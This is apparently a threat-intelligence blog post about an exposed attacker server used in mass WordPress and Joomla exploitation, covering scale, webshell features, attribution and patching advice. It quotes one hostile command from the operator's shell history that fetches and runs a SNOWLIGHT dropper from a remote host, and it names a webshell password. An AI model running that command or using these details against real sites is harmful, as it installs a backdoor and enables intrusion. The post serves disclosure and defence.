On 11 June 2026, researchers watching for exposed infrastructure found an open directory sitting on a rented US server at 137.175.93[.]126. No password, no authentication — just a plain Python web server pointed at the operator's working folder. It stayed that way for roughly three weeks.

Inside was the whole operation. Around 800MB across 434 files: the exploit scripts, the target lists, the webshells, the scan output, the command-and-control configuration, and — the part that does the real damage to the people who ran it — about two thousand lines of unedited shell history. SOCRadar, which published the fullest account, named the crew WP-ShellStorm. The Hacker News and the researchers at Ctrl-Alt-Intel filled in the rest.

I want to walk through what the server showed, because it is a rare thing. We usually reconstruct these operations from the outside — the victim's logs, a malware sample, the odd leaked chat. Here the operator handed us the working directory. And what it shows is less a shadowy adversary than a small business with poor operational security and a very long to-do list.

What was actually on the box

The scale first, because it is the number that gets the headline. The target list ran to more than 1.4 million domains — WordPress mostly, but Joomla, PrestaShop, Magento and others besides. A single file held 587,034 Joomla targets. The crew weaponised around 27 publicly known vulnerabilities, 14 of them rated critical, and not one of them a zero-day.

That last point matters, so I will say it plainly. There was no novel exploit on this server. There was no clever chain. There was a list, a pile of public proof-of-concept code, and a scanner run at scale. Ctrl-Alt-Intel counted more than 850,000 exploitation attempts across eighteen scanner runs, against roughly 442,000 unique vulnerability-and-site pairs.

Targeting came from FOFA, the Chinese equivalent of Shodan — a search engine for exposed hosts that, tellingly, requires a Chinese phone number to register. Point it at "sites running Breeze version X", export the list, feed the list to the scanner. That is the entire reconnaissance step.

The hit rates tell the useful story:

Deduplicated, the confirmed compromises come to 25,195 sites, with something over 5,700 webshells still live at the time of discovery. Those are real sites, mostly belonging to people who have no idea their marketing brochure is now hosting a remote-access panel.

The toolkit

The primary webshell was a file called down.php — four layers of obfuscation deep, and underneath it a lightly modified copy of BestShell, an open-source Chinese webshell. It is not subtle once you unwrap it: file manager, command execution, reverse shells, network scanning, a routine to fingerprint any EDR, antivirus or WAF on the host, MySQL access with user-defined-function execution for privilege escalation, and a Meterpreter stager. Twenty-odd capabilities in one PHP file, guarded by the password sfssfdgfd1212313.

There was a Godzilla-framework shell alongside it with XOR-encrypted traffic, and the operator verified successful implants with a crude but effective trick: each shell echoed the string MARKER, so a follow-up scan could confirm code execution without guessing.

The exploit code was version-controlled in spirit if not in tooling. The filenames march from wp_rce_scan.py through wp_batch_rce_v2.py to wp_rce_v8.py — eight iterations of the same machine, each faster than the last. Some of the comments in those scripts were plainly written by an AI assistant. The scanning ran in parallel through screen sessions, fifty to five hundred threads at a time. This is not a person hunched over a terminal. It is a production line.

The part where the hunters were also the hunted

Here is where the story stops being a straightforward exposure and starts being interesting.

The shell history included this line:

(curl -fsSL http://xs.xxooonline.eu.cc:8080/slw||wget http://xs.xxooonline.eu.cc:8080/slw)|sh

That is a SNOWLIGHT dropper install. SNOWLIGHT fetches VShell, a fileless Linux backdoor that lives in memory and renames its own process to [kworker/0:2] so it reads as a harmless kernel thread. Sysdig documented this exact toolchain in 2025 and tied it to UNC5174, a suspected Chinese contractor crew. The tooling that normally gets deployed to victims was running on the operator's own infrastructure.

I would be careful about what that proves. It does not make WP-ShellStorm a state operation — SOCRadar reads the crew as financially motivated, and I think that is right. What it shows is that VShell, SNOWLIGHT, Godzilla and FOFA are shared kit across the Chinese-speaking underground, passed between crews the way carpenters lend tools. The neat boxes we draw around named threat actors are leakier than the diagrams suggest. A financially motivated crew can be running the same implant as a suspected contractor, on the same day, and neither fact tells you much about the other.

Who they were, roughly

Attribution here is medium-to-high confidence, and it is confidence built from carelessness rather than cleverness. The shell history is full of Simplified Chinese: 域名去重 (deduplicate domains), 随便找一个Breeze域名 (find any Breeze domain), FOFA扫描日志 (FOFA scan log). The system user was tance. The handle chen-kk is baked into filenames. An email address, chenyk@163.com, turned up in stolen victim data.

None of that is an identity. All of it is the kind of thing an operator with any discipline would never leave sitting in a world-readable directory for three weeks.

There is one loose end nobody has tied off. A single Taiwanese IP address made more than 42,000 requests to the server, systematically pulling down the crew's entire toolkit. A second operator, a customer, a rival, or a researcher who got there before the disclosure — the logs do not say. The crew did eventually notice: someone went in and deleted the access logs between 2 and 4 July. By then the tools had been mirrored several times over.

This was the second act

The WordPress campaign was not the crew's first outing. Five weeks earlier, in May 2026, the same operator had gone after corporate Java systems through a Nacos configuration-server bug — CVE-2021-29441, a four-year-old authentication bypass. That run hit eleven systems across nine companies in fintech, e-commerce, logistics, gaming and electronics, and pulled out 613 configuration files.

The contents of those files are the genuinely expensive part of this whole story: AWS, Alibaba Cloud, Oracle, Tencent and DigitalOcean credentials, database passwords, JWT signing secrets, API tokens, Telegram bot tokens, and Alipay RSA private keys. Then, five weeks later, the same crew was spraying WordPress plugins to plant webshells. The high-value credential theft and the commodity webshell farming were the same people, working two very different tiers of access.

What to actually take from it

Three audiences read this differently, so let me split it.

If you sit on a board: your public web estate is part of your attack surface, and it is usually the part nobody owns. The marketing site on WordPress, the events microsite someone stood up for a conference, the old campaign page — these rarely fall under the CISO's remit, they are rarely patched on the same cadence as anything else, and they are precisely what a 1.4-million-line target list sweeps up. The question to ask is not "are we secure" but "who patches the marketing site, and when did they last do it". If nobody can answer, that is the finding.

If you run security: almost none of this needed sophistication to stop. Every successful compromise on that server rode a known, patched vulnerability in a plugin or theme. Plugin hygiene — patch it, or remove it if you are not using it — closes the whole thing. Failing that, virtual patching at a WAF buys you the window. Watch wp-content/uploads for PHP files that have no business being there; the crew favoured names like .bd.php, .wp-log.php and .brq-*.php under the cache directories. Deny PHP execution in upload paths outright. And watch egress: a webshell that phones home is only useful if it can reach the internet.

If you are the one at the console: the adversary here left their server open for three weeks, kept two thousand lines of plaintext history, and got their own box implanted with somebody else's backdoor. That is worth remembering the next time an incident makes the other side sound like magicians. Mass exploitation is industrialised, it is patient, and it works — but it is run by people who make the same operational mistakes we all do, and occasionally worse ones.

The uncomfortable symmetry is the lesson. A crew built a machine to find 25,000 unlocked doors and left their own wide open the entire time. Someone walked through it. The tools that let you compromise a million WordPress sites will not, it turns out, remind you to put a password on your own front door.

If your site runs WordPress, Joomla or anything with a plugin marketplace, the honest move this week is small and dull: list every plugin and theme you have, check what is patched, and delete what you are not using. It is the least glamorous control in security. It would have stopped nearly all of this.